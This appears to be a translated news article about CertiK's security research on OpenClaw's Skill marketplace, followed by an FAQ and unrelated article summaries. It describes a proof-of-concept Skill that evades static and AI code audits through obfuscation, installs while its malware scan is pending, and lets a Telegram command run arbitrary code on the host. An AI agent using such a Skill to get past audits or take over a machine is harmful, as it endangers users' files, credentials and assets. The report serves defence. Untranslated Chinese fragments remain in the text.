Is Your "OpenClaw" Running Naked? CertiK Test: How Vulnerable OpenClaw Skill Bypasses Audits, Takes Over Computers Without Authorization

marsbit2026-03-17 tarihinde yayınlandı2026-03-17 tarihinde güncellendi

Özet

OpenClaw, a popular open-source, self-hosted AI agent platform, has experienced rapid growth due to its flexibility and extensibility. Its ecosystem relies heavily on third-party “Skills” from the Clawhub marketplace, which can perform high-risk operations like system automation and crypto wallet transactions. However, security firm CertiK has identified critical vulnerabilities in the platform’s security model. CertiK’s research reveals that OpenClaw’s current security—primarily dependent on pre-publishing scans like VirusTotal, static code analysis, and AI logic checks—is fundamentally flawed. These measures can be easily bypassed through simple code obfuscation, and malicious Skills can be published even before scanning is complete. In a proof-of-concept, CertiK developed a seemingly benign Skill that contained a hidden remote code execution vulnerability. It passed all checks without warnings and, once installed, allowed full system control via a remote command. The core issue is not a specific bug but a industry-wide misconception: over-reliance on scanning instead of runtime isolation. Unlike systems like iOS, which enforce strict sandboxing, OpenClaw’s sandbox is optional and often disabled for functionality, leaving systems exposed. CertiK recommends that OpenClaw enforce mandatory sandboxing and granular permission controls for Skills. Users are advised to deploy OpenClaw on isolated devices and avoid exposing sensitive data or assets until stronger isolation is i...

Recently, the open-source self-hosted AI agent platform OpenClaw (colloquially known as "小龙虾" or "Little Crayfish") has rapidly gained popularity due to its flexible scalability and self-controlled deployment features, becoming a phenomenon in the personal AI agent space. Its core ecosystem, Clawhub, serves as an app marketplace, gathering a vast number of third-party Skill plugins that enable agents to unlock advanced capabilities with one click—from web search and content creation to encrypted wallet operations, on-chain interactions, and system automation—leading to explosive growth in both ecosystem scale and user base.

But for these third-party Skills running in high-privilege environments, where exactly are the platform's true security boundaries?

Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The report points out that the current market has a misperception of the security boundaries of AI agent ecosystems: the industry generally treats "Skill scanning" as the core security boundary, but this mechanism is almost useless against hacker attacks.

If OpenClaw is compared to an operating system for smart devices, Skills are the various APPs installed on the system. Unlike ordinary consumer-grade APPs, some Skills in OpenClaw run in high-privilege environments, directly accessing local files, calling system tools, connecting to external services, executing host environment commands, and even operating users' encrypted digital assets. Once security issues arise, they can directly lead to serious consequences such as sensitive information leakage, remote device takeover, and theft of digital assets.

The current universal security solution for third-party Skills across the industry is "pre-listing scanning and auditing." OpenClaw's Clawhub has also built a three-layer audit protection system: integrating VirusTotal code scanning, static code detection engines, and AI logic consistency checks, pushing security alerts to users through risk classification in an attempt to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests confirm that this detection system has shortcomings in real attack and defense scenarios and cannot bear the core responsibility of security protection.

The research first breaks down the inherent limitations of the existing detection mechanisms:

Static detection rules are easily bypassed. The core of this engine relies on matching code features to identify risks, such as flagging the combination of "reading sensitive environmental information + sending network requests" as high-risk behavior. However, attackers only need to make slight syntactic modifications to the code to completely bypass feature matching while fully retaining malicious logic, akin to rephrasing dangerous content in synonymous terms, rendering the security scanner completely ineffective.

AI auditing has inherent detection blind spots. The core positioning of Clawhub's AI audit is a "logic consistency detector," which can only catch obvious malicious code where "declared functionality does not match actual behavior," but is helpless against exploitable vulnerabilities hidden within normal business logic, much like how it's difficult to find fatal traps buried deep in the clauses of a seemingly compliant contract.

More critically, the audit process has underlying design flaws: even when VirusTotal scan results are still in a "pending" state, Skills that have not completed the full "health check" process can be directly listed publicly, and users can install them without any warnings, leaving an opening for attackers.

To verify the real危害性 (harmfulness) of the risk, the CertiK research team completed a full test. The team developed a Skill named "test-web-searcher," which表面上 (superficially) appears to be a fully compliant web search tool with code logic that完全符合 (fully complies with)常规开发规范 (standard development norms), but actually implants a remote code execution vulnerability within the normal functional flow.

This Skill bypassed the detection of the static engine and AI audit, and was installed normally without any security warnings while the VirusTotal scan was still pending;最终 (Finally), by remotely sending an instruction via Telegram, the vulnerability was successfully triggered, achieving arbitrary command execution on the host device (in the demo, it directly controlled the system to launch the calculator).

CertiK clearly stated in the research that these issues are not unique product bugs of OpenClaw, but rather a common cognitive error across the entire AI agent industry: the industry普遍把 (generally treats) "audit scanning" as the core security防线 (defense line), but忽略了 (neglects) the true security foundation, which is runtime强制隔离 (mandatory isolation) and精细化的权限管控 (fine-grained permission control). This is就像 (just like) how the security core of Apple's iOS ecosystem has never been the strict review of the App Store, but rather the system's mandatory sandbox mechanism and fine-grained permission control, which allows each APP to run only in its dedicated "隔离舱" (isolation compartment), unable to arbitrarily obtain system permissions. However, OpenClaw's existing sandbox mechanism is optional rather than mandatory and highly relies on manual user configuration. The vast majority of users, to ensure Skill functionality and availability, choose to disable the sandbox, ultimately leaving the agent in a "裸奔" (running naked) state. Once a Skill with vulnerabilities or malicious code is installed, it can directly lead to catastrophic consequences.

Regarding the issues discovered, CertiK also provided security guidance:

● For developers of AI agents like OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party Skills, with a fine-grained permission control model for Skills, absolutely不允许 (not allowing) third-party code to inherit the host machine's high privileges by default.

● For ordinary users, Skills labeled "Safe" in the Skill marketplace merely indicate that no risks were detected, not that they are absolutely safe. Before the official implementation of underlying strong isolation mechanisms as the default configuration, it is recommended to deploy OpenClaw on non-critical idle devices or virtual machines, and never let it near sensitive files, password credentials, or high-value加密资产 (encrypted assets).

The AI agent赛道 (track) is currently on the eve of an explosion, and the speed of ecosystem expansion must not outpace the pace of security construction. Audit scanning can only block初级 (basic) malicious attacks but can never become the security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risk exists and containing damage," and by mandating isolation boundaries from the runtime底层 (bottom layer), can the security bottom line of AI agents truly be upheld, allowing this technological transformation to proceed steadily and go the distance.

İlgili Sorular

QWhat is the main security vulnerability identified by CertiK in the OpenClaw platform's Skill ecosystem?

AThe main vulnerability is the industry's misplaced reliance on pre-upload 'scanning and auditing' as the core security boundary. This system is easily bypassed, and the platform lacks a mandatory, default sandbox isolation and fine-grained permission control model for third-party Skills, leaving high-permission environments exposed.

QHow did CertiK's proof-of-concept Skill, 'test-web-searcher', demonstrate the security flaw?

AThe 'test-web-searcher' Skill, which appeared to be a compliant web search tool, contained a hidden remote code execution vulnerability. It bypassed all static and AI auditing checks, was installed without any security warnings, and was triggered via a remote Telegram command to execute arbitrary code on the host machine (e.g., launching the system calculator).

QWhat are the two key limitations of OpenClaw's current three-layer audit protection system (Clawhub) as outlined in the research?

A1. Static detection rules can be easily bypassed through minor syntactic changes to the code that preserve the malicious logic. 2. The AI audit has a fundamental blind spot; it can only detect a mismatch between declared and actual function but is ineffective against hidden vulnerabilities embedded within normal business logic.

QWhat core security principle does CertiK recommend that OpenClaw and similar AI agent platforms adopt, drawing a comparison to Apple's iOS?

ACertiK recommends adopting a mandatory sandbox isolation mechanism and a fine-grained permission control model as the default setting for third-party Skills. This is analogous to the iOS security model, where apps run in a enforced 'sandbox' and are strictly permission-controlled, rather than relying primarily on App Store review.

QWhat practical safety advice does the article give to ordinary users of OpenClaw until stronger security measures are implemented?

AUsers are advised not to trust the 'safe' label on Skills as it only means no risks were detected, not that it is absolutely safe. They should deploy OpenClaw on non-critical, idle devices or within a virtual machine, keeping it away from sensitive files, password credentials, and high-value crypto assets.

İlgili Okumalar

Gensyn AI: Don't Let AI Repeat the Mistakes of the Internet

In recent months, the rapid growth of the AI industry has attracted significant talent from the crypto sector. A persistent question among researchers intersecting both fields is whether blockchain can become a foundational part of AI infrastructure. While many previous AI and Crypto projects focused on application layers (like AI Agents, on-chain reasoning, data markets, and compute rentals), few achieved viable commercial models. Gensyn differentiates itself by targeting the most critical and expensive layer of AI: model training. Gensyn aims to organize globally distributed GPU resources into an open AI training network. Developers can submit training tasks, nodes provide computational power, and the network verifies results while distributing incentives. The core issue addressed is not decentralization for its own sake, but the increasing centralization of compute power among tech giants. In the era of large models, access to GPUs (like the H100) has become a decisive bottleneck, dictating the pace of AI development. Major AI companies are heavily dependent on large cloud providers for compute resources. Gensyn's approach is significant for several reasons: 1) It operates at the core infrastructure layer (model training), the most resource-intensive and technically demanding part of the AI value chain. 2) It proposes a more open, collaborative model for compute, potentially increasing resource utilization by dynamically pooling idle GPUs, similar to early cloud computing logic. 3) Its technical moat lies in solving complex challenges like verifying training results, ensuring node honesty, and maintaining reliability in a distributed environment—making it more of a deep-tech infrastructure company. 4) It targets a validated, high-growth market with genuine demand, rather than pursuing blockchain integration without purpose. Ultimately, the boundaries between Crypto and AI are blurring. AI requires global resource coordination, incentive mechanisms, and collaborative systems—areas where crypto-native solutions excel. Gensyn represents a step toward making advanced training capabilities more accessible and collaborative, moving beyond a niche controlled by a few giants. If successful, it could evolve into a fundamental piece of AI infrastructure, where the most enduring value in the AI era is often created.

marsbit11 saat önce

Gensyn AI: Don't Let AI Repeat the Mistakes of the Internet

marsbit11 saat önce

Why is China's AI Developing So Fast? The Answer Lies Inside the Labs

A US researcher's visit to China's top AI labs reveals distinct cultural and organizational factors driving China's rapid AI development. While talent, data, and compute are similar to the West, Chinese labs excel through a pragmatic, execution-focused culture: less emphasis on individual stardom and conceptual debate, and more on teamwork, engineering optimization, and mastering the full tech stack. A key advantage is the integration of young students and researchers who approach model-building with fresh perspectives and low ego, prioritizing collective progress over personal credit. This contrasts with the US culture of self-promotion and "star scientist" narratives. Chinese labs also exhibit a strong "build, don't buy" mentality, preferring to develop core capabilities—like data pipelines and environments—in-house rather than relying on external services. The ecosystem feels more collaborative than tribal, with mutual respect among labs. While government support exists, its scale is unclear, and technical decisions appear driven by labs, not state mandates. Chinese companies across sectors, from platforms to consumer tech, are building their own foundational models to control their tech destiny, reflecting a broader cultural drive for technological sovereignty. Demand for AI is emerging, with spending patterns potentially mirroring cloud infrastructure more than traditional SaaS. Despite challenges like a less mature data industry and GPU shortages, Chinese labs are propelled by vast talent, rapid iteration, and deep integration with the open-source community. The competition is evolving beyond a pure model race into a contest of organizational execution, developer ecosystems, and industrial pragmatism.

marsbit13 saat önce

Why is China's AI Developing So Fast? The Answer Lies Inside the Labs

marsbit13 saat önce

3 Years, 5 Times: The Rebirth of a Century-Old Glass Factory

Corning, a 175-year-old glass company, is experiencing a dramatic revival as a key player in AI infrastructure, driven by surging demand for high-performance optical fiber in data centers. AI data centers require vastly more fiber than traditional ones—5 to 10 times as much per rack—to handle high-speed data transmission between GPUs. This structural demand shift, coupled with supply constraints from the lengthy expansion cycle for fiber preforms, has created a significant supply-demand gap. Nvidia has invested in Corning, along with Lumentum and Coherent, in a $4.5 billion total commitment to secure the optical supply chain for AI. Corning's competitive edge lies in its expertise in producing ultra-low-loss, high-density, and bend-resistant specialty fiber, which is critical for 800G+ and future 1.6T data rates. Its deep involvement in co-packaged optics (CPO) with partners like Nvidia further solidifies its position. While not the largest fiber manufacturer globally, Corning's revenue from enterprise/data center clients now exceeds 40% of its optical communications sales, and it has secured multi-year supply agreements with major hyperscalers including Meta and Nvidia. Financially, Corning's optical communications revenue has surged, doubling from $1.3 billion in 2023 to over $3 billion in 2025. Its stock price has risen nearly 6-fold since late 2023. Key future catalysts include the rollout of Nvidia's CPO products and the scale of undisclosed customer agreements. However, risks include high current valuations and potential disruption from next-generation technologies like hollow-core fiber. The company's long-term bet on light over electricity, maintained even through the telecom bubble crash, is now being validated by the AI boom.

marsbit13 saat önce

3 Years, 5 Times: The Rebirth of a Century-Old Glass Factory

marsbit13 saat önce

İşlemler

Spot
Futures
活动图片